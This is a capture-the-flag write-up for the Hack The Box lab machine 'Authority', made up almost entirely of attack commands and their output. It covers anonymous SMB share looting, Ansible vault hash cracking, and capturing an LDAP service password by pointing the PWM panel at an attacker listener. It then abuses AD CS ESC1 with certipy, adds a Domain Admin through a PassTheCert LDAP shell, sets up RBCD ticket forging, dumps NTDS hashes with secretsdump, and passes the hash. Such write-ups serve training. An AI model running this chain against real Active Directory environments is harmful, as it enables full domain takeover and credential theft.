Authority
Recon
SMB
We have access to SMB with non authorized user. There's Development share we have read access to so let's dump that.
└─$ netexec smb authority.htb -u 'anonymous' -p '' --shares --smb-timeout 1000
SMB 10.129.229.56 445 AUTHORITY [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
SMB 10.129.229.56 445 AUTHORITY [+] authority.htb\anonymous:
SMB 10.129.229.56 445 AUTHORITY [*] Enumerated shares
SMB 10.129.229.56 445 AUTHORITY Share Permissions Remark
SMB 10.129.229.56 445 AUTHORITY ----- ----------- ------
SMB 10.129.229.56 445 AUTHORITY ADMIN$ Remote Admin
SMB 10.129.229.56 445 AUTHORITY C$ Default share
SMB 10.129.229.56 445 AUTHORITY Department Shares
SMB 10.129.229.56 445 AUTHORITY Development READ
SMB 10.129.229.56 445 AUTHORITY IPC$ READ Remote IPC
SMB 10.129.229.56 445 AUTHORITY NETLOGON Logon server share
SMB 10.129.229.56 445 AUTHORITY SYSVOL Logon server share└─$ netexec smb authority.htb -u 'anonymous' -p '' --shares --smb-timeout 1000 -M spider_plus -o DOWNLOAD_FLAG=True
SPIDER_PLUS 10.129.229.56 445 AUTHORITY [+] Saved share-file metadata to "/tmp/nxc_spider_plus/10.129.229.56.json".
└─$ lta /tmp/nxc_spider_plus/10.129.229.56/Development/Automation/Ansible/
drwxrwxr-x - woyag 7 Dec 12:11 /tmp/nxc_spider_plus/10.129.229.56/Development/Automation/Ansible
drwxrwxr-x - woyag 7 Dec 12:11 ├── ADCS
.rw-rw-r-- 259 woyag 7 Dec 12:10 │ ├── .ansible-lint
.rw-rw-r-- 205 woyag 7 Dec 12:10 │ ├── .yamllint
drwxrwxr-x - woyag 7 Dec 12:10 │ ├── defaults
.rw-rw-r-- 1.6k woyag 7 Dec 12:10 │ │ └── main.yml
.rw-rw-r-- 11k woyag 7 Dec 12:10 │ ├── LICENSE
drwxrwxr-x - woyag 7 Dec 12:10 │ ├── meta
.rw-rw-r-- 549 woyag 7 Dec 12:10 │ │ ├── main.yml
.rw-rw-r-- 22 woyag 7 Dec 12:10 │ │ └── preferences.yml
drwxrwxr-x - woyag 7 Dec 12:10 │ ├── molecule
drwxrwxr-x - woyag 7 Dec 12:11 │ │ └── default
.rw-rw-r-- 106 woyag 7 Dec 12:10 │ │ ├── converge.yml
.rw-rw-r-- 526 woyag 7 Dec 12:11 │ │ ├── molecule.yml
.rw-rw-r-- 371 woyag 7 Dec 12:11 │ │ └── prepare.yml
.rw-rw-r-- 7.3k woyag 7 Dec 12:11 │ ├── README.md
.rw-rw-r-- 466 woyag 7 Dec 12:11 │ ├── requirements.txt
.rw-rw-r-- 264 woyag 7 Dec 12:11 │ ├── requirements.yml
.rw-rw-r-- 924 woyag 7 Dec 12:11 │ ├── SECURITY.md
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── tasks
.rw-rw-r-- 2.9k woyag 7 Dec 12:11 │ │ ├── assert.yml
.rw-rw-r-- 2.3k woyag 7 Dec 12:11 │ │ ├── generate_ca_certs.yml
.rw-rw-r-- 1.2k woyag 7 Dec 12:11 │ │ ├── init_ca.yml
.rw-rw-r-- 1.4k woyag 7 Dec 12:11 │ │ ├── main.yml
.rw-rw-r-- 4.2k woyag 7 Dec 12:11 │ │ └── requests.yml
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── templates
.rw-rw-r-- 1.7k woyag 7 Dec 12:11 │ │ ├── extensions.cnf.j2
.rw-rw-r-- 11k woyag 7 Dec 12:11 │ │ └── openssl.cnf.j2
.rw-rw-r-- 419 woyag 7 Dec 12:11 │ ├── tox.ini
drwxrwxr-x - woyag 7 Dec 12:11 │ └── vars
.rw-rw-r-- 2.1k woyag 7 Dec 12:11 │ └── main.yml
drwxrwxr-x - woyag 7 Dec 12:11 ├── LDAP
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── .bin
.rw-rw-r-- 677 woyag 7 Dec 12:11 │ │ ├── clean_vault
.rw-rw-r-- 357 woyag 7 Dec 12:11 │ │ ├── diff_vault
.rw-rw-r-- 768 woyag 7 Dec 12:11 │ │ └── smudge_vault
.rw-rw-r-- 1.4k woyag 7 Dec 12:11 │ ├── .travis.yml
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── defaults
.rw-rw-r-- 1.0k woyag 7 Dec 12:11 │ │ └── main.yml
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── files
.rw-rw-r-- 170 woyag 7 Dec 12:11 │ │ └── pam_mkhomedir
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── handlers
.rw-rw-r-- 277 woyag 7 Dec 12:11 │ │ └── main.yml
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── meta
.rw-rw-r-- 416 woyag 7 Dec 12:11 │ │ └── main.yml
.rw-rw-r-- 5.8k woyag 7 Dec 12:11 │ ├── README.md
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── tasks
.rw-rw-r-- 5.2k woyag 7 Dec 12:11 │ │ └── main.yml
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── templates
.rw-rw-r-- 131 woyag 7 Dec 12:11 │ │ ├── ldap_sudo_groups.j2
.rw-rw-r-- 106 woyag 7 Dec 12:11 │ │ ├── ldap_sudo_users.j2
.rw-rw-r-- 2.6k woyag 7 Dec 12:11 │ │ ├── sssd.conf.j2
.rw-rw-r-- 30 woyag 7 Dec 12:11 │ │ └── sudo_group.j2
.rw-rw-r-- 119 woyag 7 Dec 12:11 │ ├── TODO.md
.rw-rw-r-- 640 woyag 7 Dec 12:11 │ ├── ⍱ Vagrantfile
drwxrwxr-x - woyag 7 Dec 12:11 │ └── vars
.rw-rw-r-- 174 woyag 7 Dec 12:11 │ ├── debian.yml
.rw-rw-r-- 75 woyag 7 Dec 12:11 │ ├── main.yml
.rw-rw-r-- 222 woyag 7 Dec 12:11 │ ├── redhat.yml
.rw-rw-r-- 203 woyag 7 Dec 12:11 │ └── ubuntu-14.04.yml
drwxrwxr-x - woyag 7 Dec 12:11 ├── PWM
.rw-rw-r-- 491 woyag 7 Dec 12:11 │ ├── ansible.cfg
.rw-rw-r-- 174 woyag 7 Dec 12:11 │ ├── ansible_inventory
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── defaults
.rw-rw-r-- 1.6k woyag 7 Dec 12:11 │ │ └── main.yml
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── handlers
.rw-rw-r-- 4 woyag 7 Dec 12:11 │ │ └── main.yml
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── meta
.rw-rw-r-- 199 woyag 7 Dec 12:11 │ │ └── main.yml
.rw-rw-r-- 1.3k woyag 7 Dec 12:11 │ ├── README.md
drwxrwxr-x - woyag 7 Dec 12:11 │ ├── tasks
.rw-rw-r-- 1.8k woyag 7 Dec 12:11 │ │ └── main.yml
drwxrwxr-x - woyag 7 Dec 12:11 │ └── templates
.rw-rw-r-- 422 woyag 7 Dec 12:11 │ ├── context.xml.j2
.rw-rw-r-- 388 woyag 7 Dec 12:11 │ └── tomcat-users.xml.j2
drwxrwxr-x - woyag 7 Dec 12:11 └── SHARE
drwxrwxr-x - woyag 7 Dec 12:11 └── tasks
.rw-rw-r-- 1.9k woyag 7 Dec 12:11 └── main.yml
Creds:
T0mc@tAdm1n:T0mc@tR00t
Defaults contain some kind of ansible credentials.
└─$ ansible2john ldap_admin_password.txt > ldap_admin_password.hash
└─$ ansible2john pwm_admin_login.txt > pwm_admin_login.hash
└─$ ansible2john pwm_admin_password.txt > pwm_admin_password.hash
└─$ cat *.hash > hashes
---
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
!@#$%^&* (pwm_admin_password.txt)
!@#$%^&* (pwm_admin_login.txt)
!@#$%^&* (ldap_admin_password.txt)Creds:
!@#$%^&*:!@#$%^&*
https://www.bengrewell.com/cracking-ansible-vault-secrets-with-hashcat/
└─$ sudo apt install ansible-core -y
└─$ cat ansible/ldap_admin_password.txt | ansible-vault decrypt
Vault password:
Decryption successful
DevT3st@123
└─$ cat ansible/pwm_admin_login.txt | ansible-vault decrypt
Vault password:
Decryption successful
svc_pwm
└─$ cat ansible/pwm_admin_password.txt | ansible-vault decrypt
Vault password:
Decryption successful
pWm_@dm!N_!23Creds:
svc_pwm:pWm_@dm!N_!23
Password:
DevT3st@123
HTTPs (8443)
PWM is an open source password self-service application for LDAP directories.
From dropdown arrow we see version is PWM v2.0.3 bc96802e, it's few versions behind at the moment https://github.com/pwm-project/pwm/releases
Credentials from SMB doesn't work.
Second ansible credentials is also incorrect.
Password pWm_@dm!N_!23 logs us in.
We can download the configuration file which contains some kind of password.
There's additional username, but can't login with found credentials.
<setting key="ldap.proxy.username" modifyTime="2022-08-11T01:46:23Z" profile="default" syntax="STRING" syntaxVersion="0">
<label>LDAP ⇨ LDAP Directories ⇨ default ⇨ Connection ⇨ LDAP Proxy User</label>
<value>CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb</value>
</setting>Hash is not going to crack any time soon so Im giving up on that.
There are too many settings and it's overwhelming to explore, more down you go the less you understand and most of it is left to defaults AFAIK. Connection contains LDAP Proxy Password, but it's protected. We are able to add LDAP URLs, so we could try adding ourselves and see what we get.
Add ldap://10.10.14.113:636 to urls and then test, wait for callback:
└─$ yes | ncat -lvnkp 636
Ncat: Connection from 10.129.229.56:62553.
0Y`T;CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htblDaP_1n_th3_cle4r!New credentials.. but looks like password starts after DC TLD.
Creds:
svc_ldap:lDaP_1n_th3_cle4r!
└─$ netexec smb authority.htb -u 'svc_ldap' -p 'htblDaP_1n_th3_cle4r!'
SMB 10.129.229.56 445 AUTHORITY [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
SMB 10.129.229.56 445 AUTHORITY [-] authority.htb\svc_ldap:htblDaP_1n_th3_cle4r! STATUS_LOGON_FAILURE
└─$ netexec smb authority.htb -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!'
SMB 10.129.229.56 445 AUTHORITY [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
SMB 10.129.229.56 445 AUTHORITY [+] authority.htb\svc_ldap:lDaP_1n_th3_cle4r!WinRM
└─$ netexec winrm authority.htb -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!'
WINRM 10.129.229.56 5985 AUTHORITY [*] Windows 10 / Server 2019 Build 17763 (name:AUTHORITY) (domain:authority.htb)
WINRM 10.129.229.56 5985 AUTHORITY [+] authority.htb\svc_ldap:lDaP_1n_th3_cle4r! (Pwn3d!)
└─$ evil-winrm -i authority.htb -u svc_ldap -p 'lDaP_1n_th3_cle4r!'
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> whoami /all
User Name SID
============ =============================================
htb\svc_ldap S-1-5-21-622327497-3269355298-2248959698-1601
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledUser.txt
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> cat ../Desktop/user.txt
2be9deb850ae73c7e96fc2bcffe65046Privilege Escalation
We could try the default enumeration with winpeas + bloodhound, but considering the name we are 110% dealing with misconfigured certificates.
└─$ certipy-ad find -vulnerable -u 'svc_ldap@authority.htb' -p 'lDaP_1n_th3_cle4r!' -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
[!] Got error while trying to get CA configuration for 'AUTHORITY-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'AUTHORITY-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'AUTHORITY-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : AUTHORITY-CA
DNS Name : authority.authority.htb
Certificate Subject : CN=AUTHORITY-CA, DC=authority, DC=htb
Certificate Serial Number : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
Certificate Validity Start : 2023-04-24 01:46:26+00:00
Certificate Validity End : 2123-04-24 01:56:25+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : AUTHORITY.HTB\Administrators
Access Rights
ManageCertificates : AUTHORITY.HTB\Administrators
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
ManageCa : AUTHORITY.HTB\Administrators
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
Enroll : AUTHORITY.HTB\Authenticated Users
Certificate Templates
0
Template Name : CorpVPN
Display Name : Corp VPN
Certificate Authorities : AUTHORITY-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : AutoEnrollmentCheckUserDsCertificate
PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Document Signing
IP security IKE intermediate
IP security use
KDC Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 20 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : AUTHORITY.HTB\Domain Computers
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
Object Control Permissions
Owner : AUTHORITY.HTB\Administrator
Write Owner Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
Write Dacl Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
Write Property Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authenticationhttps://github.com/ly4k/Certipy?tab=readme-ov-file#esc1https://www.thehacker.recipes/ad/movement/adcs/certificate-templates#esc1-template-allows-sanhttps://ppn.snovvcrash.rocks/pentest/infrastructure/ad/ad-cs-abuse/esc1
'AUTHORITY.HTB\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
To abuse this we need a computer on a network and we should be able to create one.
└─$ netexec ldap authority.htb -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!' -L
...
[*] maq Retrieves the MachineAccountQuota domain-level attribute
└─$ netexec ldap authority.htb -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!' -M maq
SMB 10.129.229.56 445 AUTHORITY [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
LDAPS 10.129.229.56 636 AUTHORITY [+] authority.htb\svc_ldap:lDaP_1n_th3_cle4r!
MAQ 10.129.229.56 389 AUTHORITY [*] Getting the MachineAccountQuota
MAQ 10.129.229.56 389 AUTHORITY MachineAccountQuota: 10https://www.thehacker.recipes/ad/movement/builtins/machineaccountquota#create-a-computer-account
# bloodyad -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --host "$DC_HOST" add computer 'SomeName' 'SomePassword'
└─$ bloodyAD -d 'authority.htb' -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!' --host '10.129.229.56' add computer 'Letmein' 'Password123$'
[+] Letmein createdVerify that it was created:
└─$ netexec ldap authority.htb -u 'Letmein$' -p 'Password123$'
SMB 10.129.229.56 445 AUTHORITY [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
LDAPS 10.129.229.56 636 AUTHORITY [+] authority.htb\Letmein$:Password123$
└─$ netexec ldap authority.htb -u 'Letmein$' -p 'Password123$x'
SMB 10.129.229.56 445 AUTHORITY [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
LDAP 10.129.229.56 389 AUTHORITY [-] authority.htb\Letmein$:Password123$xPerform the ESC1 attack
└─$ USER='Letmein$'
PASSWORD='Password123$'
DOMAIN='authority.htb'
DC_IP='10.129.229.56'
CA='AUTHORITY-CA'
TEMPLATE='CorpVPN'
faketime -f +4h certipy-ad req -u "$USER" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$DOMAIN" -ca "$CA" -template "$TEMPLATE" -upn "administrator@$DOMAIN"
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with UPN 'administrator@authority.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'└─$ faketime -f +4h certipy-ad auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@authority.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)https://www.thehacker.recipes/ad/movement/schannel/passthecert
└─$ git clone https://github.com/AlmondOffSec/PassTheCert.git
└─$ USER='administrator'
DOMAIN='authority.htb'
DC_IP='10.129.229.56'
certipy-ad cert -pfx "$USER.pfx" -nokey -out "$USER.crt"
certipy-ad cert -pfx "$USER.pfx" -nocert -out "$USER.key"
py ./PassTheCert/Python/passthecert.py -action ldap-shell -crt "$USER.crt" -key "$USER.key" -domain "$DOMAIN" -dc-ip "$DC_IP"
certipy-ad auth -pfx -dc-ip "$DC_IP" -ldap-shell
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Writing certificate and to 'administrator.crt'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Writing private key to 'administrator.key'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# whoami
u:HTB\AdministratorPath 1
One option is to add yourself to domain and add yourself to and groups. or add existing pwned users to any groups.
# add_user letmein
Attempting to create user in: %s CN=Users,DC=authority,DC=htb
Adding new user with username: letmein and password: jJyH[By!sym9;(I result: OK
# add_user_to_group letmein 'Domain Admins'
# add_user_to_group letmein 'Administrators'
# add_user_to_group letmein 'Remote Management Users'
# change_password letmein 'Password123$'
Got User DN: CN=letmein,CN=Users,DC=authority,DC=htb
Attempting to set new password of: Password123$
Password changed successfully!└─$ evil-winrm -i authority.htb -u letmein -p 'Password123$'
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\letmein\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session EnabledNote: We could have added ourself to
Administratorsand then usedpsexecfromimpacket
Path 2
We can also abuse the delegations
# set_rbcd 'authority$' 'Letmein$'
Found Target DN: CN=AUTHORITY,OU=Domain Controllers,DC=authority,DC=htb
Target SID: S-1-5-21-622327497-3269355298-2248959698-1000
Found Grantee DN: CN=Letmein,CN=Computers,DC=authority,DC=htb
Grantee SID: S-1-5-21-622327497-3269355298-2248959698-12104
Delegation rights modified successfully!
Letmein$ can now impersonate users on authority$ via S4U2ProxyNow we can request the Silver Ticket
└─$ faketime -f +4h impacket-getST -spn 'cifs/AUTHORITY.AUTHORITY.HTB' -impersonate administrator 'AUTHORITY.HTB/Letmein$:Password123$'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_AUTHORITY.AUTHORITY.HTB@AUTHORITY.HTB.ccache└─$ KRB5CCNAME=administrator@cifs_AUTHORITY.AUTHORITY.HTB@AUTHORITY.HTB.ccache klist
Ticket cache: FILE:administrator@cifs_AUTHORITY.AUTHORITY.HTB@AUTHORITY.HTB.ccache
Default principal: administrator@AUTHORITY.HTB
Valid starting Expires Service principal
12/07/2024 18:07:07 12/08/2024 04:07:07 cifs/AUTHORITY.AUTHORITY.HTB@AUTHORITY.HTB
renew until 12/08/2024 18:07:06
└─$ KRB5CCNAME=administrator@cifs_AUTHORITY.AUTHORITY.HTB@AUTHORITY.HTB.ccache faketime -f +4h impacket-secretsdump -k -no-pass 'AUTHORITY.HTB/administrator@authority.authority.htb' -just-dc-ntlm
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6961f422924da90a6928197429eea4ed:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:bd6bd7fcab60ba569e3ed57c7c322908:::
svc_ldap:1601:aad3b435b51404eeaad3b435b51404ee:6839f4ed6c7e142fed7988a6c5d0c5f1:::
letmein:12103:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665:::
AUTHORITY$:1000:aad3b435b51404eeaad3b435b51404ee:d33147d2c0d25b716bba0e960fbf9f34:::
Letmein$:12104:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665:::
[*] Cleaning up...
└─$ evil-winrm -i authority.htb -u administrator -H '6961f422924da90a6928197429eea4ed'
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administratorRoot.txt
f078d946a0d4910dd745a90e0b555f6fLast updated